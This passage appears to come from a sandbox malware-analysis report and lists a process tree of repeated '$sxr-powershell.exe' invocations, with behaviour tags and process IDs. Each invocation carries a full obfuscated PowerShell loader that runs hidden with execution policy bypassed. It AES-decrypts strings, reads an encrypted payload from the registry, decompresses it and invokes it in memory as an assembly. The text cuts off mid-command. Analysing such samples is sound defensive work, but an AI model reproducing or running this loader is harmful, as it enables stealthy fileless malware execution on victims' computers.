        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4496).WaitForExit();[System.Threading.Thread]::Sleep(5000); $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5144
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4496).WaitForExit();[System.Threading.Thread]::Sleep(5000); $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5240
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4496).WaitForExit();[System.Threading.Thread]::Sleep(5000); $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
        5⤵
        Executes dropped EXE
        
        PID:5340
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4496).WaitForExit();[System.Threading.Thread]::Sleep(5000); $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join 